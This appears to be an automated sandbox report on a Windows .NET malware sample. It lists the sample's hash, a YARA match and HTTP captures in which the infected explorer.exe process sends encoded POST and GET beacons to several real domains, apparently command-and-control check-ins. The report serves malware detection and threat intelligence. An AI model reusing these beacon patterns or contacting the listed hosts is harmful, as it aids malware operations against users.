                                                                                              Data Raw: 50 4a 73 4f 65 3d 6c 32 41 73 4c 50 61 6c 70 48 65 4c 28 77 41 6b 55 51 6b 4e 39 56 4f 34 4a 45 41 6e 74 34 6c 37 4a 77 78 53 34 2d 41 75 32 79 69 61 54 59 79 67 4a 44 70 76 59 58 4b 72 58 59 59 65 6e 34 50 4b 6a 45 79 6c 67 41 36 30 74 46 52 31 6d 31 7e 4f 70 46 32 79 28 63 66 43 69 2d 48 55 57 54 45 38 30 70 54 48 57 32 58 39 76 44 59 73 34 77 4c 77 6d 72 47 36 56 6e 35 6b 62 64 6b 56 6b 7a 6f 6d 79 49 4c 52 4a 4c 43 66 78 6d 42 63 39 34 51 44 6f 4e 4d 56 28 4a 7a 58 50 4f 36 30 66 66 42 70 72 48 48 7a 30 37 78 63 66 49 34 51 56 4c 53 36 32 67 29 2e 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: PJsOe=l2AsLPalpHeL(wAkUQkN9VO4JEAnt4l7JwxS4-Au2yiaTYygJDpvYXKrXYYen4PKjEylgA60tFR1m1~OpF2y(cfCi-HUWTE80pTHW2X9vDYs4wLwmrG6Vn5kbdkVkzomyILRJLCfxmBc94QDoNMV(JzXPO60ffBprHHz07xcfI4QVLS62g).
                                                                                              Dec 27, 2022 10:54:26.117521048 CET184INHTTP/1.1 301 Moved Permanently
                                                                                              Server: nginx
                                                                                              Date: Tue, 27 Dec 2022 09:54:25 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 162
                                                                                              Connection: close
                                                                                              Location: https://www.loaddown.vip/p6a2/
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              30192.168.2.449727194.58.112.17480C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:56:32.316085100 CET330OUTPOST /p6a2/ HTTP/1.1
                                                                                              Host: www.newhard.ru
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              Cache-Control: no-cache
                                                                                              Origin: http://www.newhard.ru
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://www.newhard.ru/p6a2/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Data Raw: 50 4a 73 4f 65 3d 65 35 6d 38 34 30 68 58 37 39 52 65 28 6d 43 31 69 43 4b 78 4e 76 4b 61 31 63 64 70 52 6b 49 71 68 36 53 4f 39 31 35 50 77 70 47 4f 36 73 7e 39 68 4e 5a 55 6c 4b 35 38 54 67 6d 79 7a 77 48 57 4c 4f 4e 76 63 76 45 6f 7a 46 59 79 6d 63 77 6f 43 46 50 34 52 56 32 73 31 57 4c 52 39 43 7e 6a 7e 4f 31 32 32 65 48 65 6a 4d 68 4d 68 42 64 42 4b 47 70 74 7a 53 58 4d 7a 64 63 6e 32 6d 53 4a 45 52 33 63 6d 63 53 61 6d 4a 55 33 28 63 41 45 4f 44 79 4f 48 53 44 5a 4e 38 4f 39 71 36 73 31 6d 71 73 57 73 4a 79 4b 31 6a 45 62 6c 77 36 6b 48 51 29 2e 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: PJsOe=e5m840hX79Re(mC1iCKxNvKa1cdpRkIqh6SO915PwpGO6s~9hNZUlK58TgmyzwHWLONvcvEozFYymcwoCFP4RV2s1WLR9C~j~O122eHejMhMhBdBKGptzSXMzdcn2mSJER3cmcSamJU3(cAEODyOHSDZN8O9q6s1mqsWsJyK1jEblw6kHQ).
                                                                                              Dec 27, 2022 10:56:32.375020981 CET331INHTTP/1.1 302 Moved Temporarily
                                                                                              Server: nginx
                                                                                              Date: Tue, 27 Dec 2022 09:56:32 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 154
                                                                                              Connection: close
                                                                                              Location: http://newhard.ru/p6a2/
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              31192.168.2.449728194.58.112.17480C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:56:34.904155970 CET332OUTGET /p6a2/?PJsOe=T7Oc7Ddw1O0v8xiwxjGjB92YwMYIGm5zgL68zmFX3c2O6eqvx6hztOx3eHSliQXWKuFqXfEa/HBDnsFpMkr8eF2T22317iGL4Q==&4u=XXw8ZRfd0 HTTP/1.1
                                                                                              Host: www.newhard.ru
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Dec 27, 2022 10:56:34.966134071 CET332INHTTP/1.1 302 Moved Temporarily
                                                                                              Server: nginx
                                                                                              Date: Tue, 27 Dec 2022 09:56:34 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 154
                                                                                              Connection: close
                                                                                              Location: http://newhard.ru/p6a2/?PJsOe=T7Oc7Ddw1O0v8xiwxjGjB92YwMYIGm5zgL68zmFX3c2O6eqvx6hztOx3eHSliQXWKuFqXfEa/HBDnsFpMkr8eF2T22317iGL4Q==&4u=XXw8ZRfd0
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              4192.168.2.44969935.77.200.3380C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:54:29.333051920 CET184OUTGET /p6a2/?4u=XXw8ZRfd0&PJsOe=o0oMI+STs16Mw38KQSkvmmC4P0sg0o0mDw904OgUvxPlTLKfXC9NdymWUu8a4Kbhpw71hSKOgFJzukOjlHXbsoCiidHLGDEsuA== HTTP/1.1
                                                                                              Host: www.loaddown.vip
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Dec 27, 2022 10:54:29.591451883 CET185INHTTP/1.1 301 Moved Permanently
                                                                                              Server: nginx
                                                                                              Date: Tue, 27 Dec 2022 09:54:29 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 162
                                                                                              Connection: close
                                                                                              Location: https://www.loaddown.vip/p6a2/?4u=XXw8ZRfd0&PJsOe=o0oMI+STs16Mw38KQSkvmmC4P0sg0o0mDw904OgUvxPlTLKfXC9NdymWUu8a4Kbhpw71hSKOgFJzukOjlHXbsoCiidHLGDEsuA==
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              5192.168.2.449700162.254.33.21480C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:54:34.834264994 CET186OUTPOST /p6a2/ HTTP/1.1
                                                                                              Host: www.scastive.online
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              Cache-Control: no-cache
                                                                                              Origin: http://www.scastive.online
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://www.scastive.online/p6a2/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Data Raw: 50 4a 73 4f 65 3d 54 4c 78 56 7e 47 59 33 6b 57 78 49 69 47 62 5a 42 32 6e 7a 6b 66 48 68 31 5f 58 4e 68 44 37 70 63 66 64 68 4d 50 6a 38 30 64 30 4f 65 45 74 6f 77 4f 53 68 72 79 38 51 41 58 6c 62 4f 70 4e 4c 37 51 5a 73 4d 31 4e 73 51 73 36 79 6a 6a 66 71 4a 33 7e 49 6b 32 72 35 63 6c 78 58 7a 44 30 56 4d 75 57 46 48 74 50 71 4f 69 31 75 4b 32 64 6a 31 76 34 4d 7a 6c 38 6f 74 2d 55 65 6f 2d 49 35 6a 50 46 35 54 4d 41 7a 4f 39 6f 6b 65 49 41 66 72 42 36 56 56 77 52 66 56 74 7a 76 78 58 57 78 4a 5f 76 6c 70 4a 78 35 37 53 6a 55 74 56 28 49 39 77 29 2e 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: PJsOe=TLxV~GY3kWxIiGbZB2nzkfHh1_XNhD7pcfdhMPj80d0OeEtowOShry8QAXlbOpNL7QZsM1NsQs6yjjfqJ3~Ik2r5clxXzD0VMuWFHtPqOi1uK2dj1v4Mzl8ot-Ueo-I5jPF5TMAzO9okeIAfrB6VVwRfVtzvxXWxJ_vlpJx57SjUtV(I9w).
                                                                                              Dec 27, 2022 10:54:35.090717077 CET187INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 27 Dec 2022 09:54:34 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              6192.168.2.449701162.254.33.21480C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:54:37.541791916 CET188OUTGET /p6a2/?PJsOe=eJZ19xYC8GRyuRPgB3K3hYHN997ZzA7xE9BAJMP39dttW2h4vf6lg00rKUwCf45owTZaCQIOMq2NpT3yCXeggU/kVHtPphUyBg==&4u=XXw8ZRfd0 HTTP/1.1
                                                                                              Host: www.scastive.online
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Dec 27, 2022 10:54:37.825251102 CET188INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 27 Dec 2022 09:54:37 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              7192.168.2.44970264.225.91.7380C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:54:43.222023010 CET189OUTPOST /p6a2/ HTTP/1.1
                                                                                              Host: www.dubmoviedaaa.com
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              Cache-Control: no-cache
                                                                                              Origin: http://www.dubmoviedaaa.com
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://www.dubmoviedaaa.com/p6a2/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Data Raw: 50 4a 73 4f 65 3d 47 49 37 4a 77 6e 38 75 52 70 65 37 4e 44 70 6f 75 4f 34 48 28 6d 4f 49 4a 4b 72 74 55 53 4d 31 46 4f 68 4e 33 68 34 69 28 30 4b 53 63 55 4c 43 42 59 77 64 54 61 78 49 48 70 46 53 39 2d 4d 72 48 65 65 32 67 31 7a 56 4f 4d 42 43 37 6e 56 68 69 2d 4c 4e 30 53 4f 6c 4d 55 59 74 38 72 4e 68 7a 32 70 6d 69 78 46 74 6d 74 32 72 4e 45 38 2d 6e 58 41 67 39 46 51 31 37 4d 38 50 78 64 68 67 58 63 32 32 39 65 68 47 6d 37 52 42 61 35 4a 39 74 6d 7e 30 68 43 37 65 52 66 67 4b 5a 5f 74 6d 4e 5a 4c 6b 61 6e 4f 6b 50 43 4a 39 76 57 5a 50 46 51 29 2e 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: PJsOe=GI7Jwn8uRpe7NDpouO4H(mOIJKrtUSM1FOhN3h4i(0KScULCBYwdTaxIHpFS9-MrHee2g1zVOMBC7nVhi-LN0SOlMUYt8rNhz2pmixFtmt2rNE8-nXAg9FQ17M8PxdhgXc229ehGm7RBa5J9tm~0hC7eRfgKZ_tmNZLkanOkPCJ9vWZPFQ).
                                                                                              Dec 27, 2022 10:54:43.391475916 CET190INHTTP/1.1 200 OK
                                                                                              server: nginx/1.18.0 (Ubuntu)
                                                                                              date: Tue, 27 Dec 2022 09:54:43 GMT
                                                                                              content-type: text/html
                                                                                              last-modified: Wed, 12 Jan 2022 17:20:45 GMT
                                                                                              etag: W/"61df0ded-1ad"
                                                                                              content-encoding: gzip
                                                                                              connection: close
                                                                                              transfer-encoding: chunked
                                                                                              Data Raw: 31 34 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 91 dd 6b c2 30 14 c5 df f7 57 84 b2 07 c5 2d b1 0e 61 1f d6 b1 29 3e 38 71 54 37 a1 be c5 34 6d 52 d2 5c cd 07 b6 8c fd ef ab 55 c6 60 4f e7 5e 38 dc 73 7e dc 91 70 a5 1a 5f 8d 04 a7 69 23 96 19 b9 77 c8 1a 16 05 c2 b9 bd 7d 24 84 a5 ba b0 98 29 f0 69 a6 a8 e1 98 41 49 68 41 2b a2 e4 ce 92 e2 e0 b9 a9 c9 1d 1e e2 f0 b2 e0 52 6a 5c d8 00 49 ed 78 6e a4 ab a3 c0 0a 3a 0c 07 b7 bb c5 47 3f 2e 1f 36 fa 25 d9 4e 33 55 bf b1 57 1a 0f f2 bc 2f d6 c9 32 36 f3 fb 95 54 89 4a 93 38 9c 55 71 02 93 85 fb 2c bc 5f f9 2d f4 b2 e2 20 2a 72 70 07 12 4a 37 ef 4f 06 bc 98 56 ca 6d 37 b3 3c 8a 02 c4 0c 58 0b 46 e6 52 47 01 d5 a0 eb 12 bc 0d c6 23 72 86 6a e8 c8 85 72 07 69 3d be 42 e8 82 7b 1a 11 ba c6 39 77 f3 f5 fb b2 83 7e d1 53 28 a9 d4 4c 3b 03 aa c5 7e 3e 05 08 b0 ae 09 ec a1 a3 d4 29 1c b1 02 46 9d 04 8d 85 e1 d9 0d ca bc 66 a7 b5 83 bc 51 a8 8b be da f3 e8 9f db f0 bd a2 8c 77 1a 57 f7 a9 f5 7c b7 fa b7 f0 b9 69 53 bc fd d2 0f 60 78 13 ae ad 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 149ek0W-a)>8qT74mR\U`O^8s~p_i#w}$)iAIhA+Rj\Ixn:G?.6%N3UW/26TJ8Uq,_- *rpJ7OVm7<XFRG#rjri=B{9w~S(L;~>)FfQwW|iS`x0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              8192.168.2.44970364.225.91.7380C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:54:45.923196077 CET191OUTGET /p6a2/?4u=XXw8ZRfd0&PJsOe=LKTpzSYaad7RY09JlOwiwWKJMKTbKDNtKtFdzgs46VqeU13weoYdOe5FHZNBqvs7M9aWsXvPLdZvpHBZqtvQwjuXQVIPrJpS5Q== HTTP/1.1
                                                                                              Host: www.dubmoviedaaa.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Dec 27, 2022 10:54:46.092865944 CET192INHTTP/1.1 200 OK
                                                                                              server: nginx/1.18.0 (Ubuntu)
                                                                                              date: Tue, 27 Dec 2022 09:54:46 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 429
                                                                                              last-modified: Wed, 12 Jan 2022 17:20:45 GMT
                                                                                              etag: "61df0ded-1ad"
                                                                                              accept-ranges: bytes
                                                                                              connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 35 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 62 4c 54 30 51 6d 39 56 6e 41 59 5a 44 66 6c 79 4b 63 42 61 51 32 67 67 30 68 53 59 4e 51 72 4a 38 52 69 6c 59 6c 64 59 51 31 46 78 51 59 6f 43 4c 74 55 6a 75 75 52 75 5a 6f 2b 66 6a 71 68 78 2f 71 74 71 2f 31 69 74 4a 30 43 32 65 6a 44 78 6c 74 5a 56 46 67 3d 3d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 24 2e 67 65 74 4a 53 4f 4e 28 20 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2c 20 66 75 6e 63 74 69 6f 6e 28 20 75 72 6c 20 29 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 75 72 6c 29 3b 0a 20 20 20 20 7d 29 3b 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <html><head><script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js" integrity="sha512-bLT0Qm9VnAYZDflyKcBaQ2gg0hSYNQrJ8RilYldYQ1FxQYoCLtUjuuRuZo+fjqhx/qtq/1itJ0C2ejDxltZVFg==" crossorigin="anonymous"></script></head><body> <script> $.getJSON( "https://domaincntrol.com/?orighost=" + window.location.href, function( url ) { window.location.replace(url); }); </script></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              9192.168.2.449704107.149.40.24780C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:54:51.448692083 CET193OUTPOST /p6a2/ HTTP/1.1
                                                                                              Host: www.elite-travel-cn.com
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              Cache-Control: no-cache
                                                                                              Origin: http://www.elite-travel-cn.com
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://www.elite-travel-cn.com/p6a2/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Data Raw: 50 4a 73 4f 65 3d 38 63 6d 42 55 51 62 75 33 50 61 75 74 51 62 4f 4d 42 53 76 35 46 33 6d 79 44 79 55 74 33 44 5f 66 34 54 59 35 41 4d 42 59 77 44 64 4e 30 35 4e 57 5f 48 5a 54 53 6f 50 46 30 31 70 76 54 78 45 41 6a 38 5f 38 4c 33 4f 4a 65 6f 71 38 6a 79 41 69 65 41 51 55 56 6a 79 51 38 31 64 41 4b 64 52 6e 2d 42 4c 68 72 4c 31 48 50 62 68 37 6d 48 62 59 49 52 59 42 4b 47 35 63 4b 32 77 4f 72 61 4a 73 67 57 47 7a 77 28 73 4e 54 34 70 38 38 52 51 63 36 43 50 71 54 41 38 52 76 36 42 6a 57 36 72 69 4c 79 6a 58 30 57 39 46 37 76 42 4e 76 44 78 42 41 29 2e 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: PJsOe=8cmBUQbu3PautQbOMBSv5F3myDyUt3D_f4TY5AMBYwDdN05NW_HZTSoPF01pvTxEAj8_8L3OJeoq8jyAieAQUVjyQ81dAKdRn-BLhrL1HPbh7mHbYIRYBKG5cK2wOraJsgWGzw(sNT4p88RQc6CPqTA8Rv6BjW6riLyjX0W9F7vBNvDxBA).
                                                                                              Dec 27, 2022 10:54:51.646505117 CET193INHTTP/1.1 400 Bad Request
                                                                                              Server: nginx
                                                                                              Date: Tue, 27 Dec 2022 09:54:51 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: d404 Not Found0


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:10:52:28
                                                                                              Start date:27/12/2022
                                                                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe
                                                                                              Imagebase:0xd40000
                                                                                              File size:850432 bytes
                                                                                              MD5 hash:DAFC40B0CA83E739D2733EF7F0CA70F8
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.303083113.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
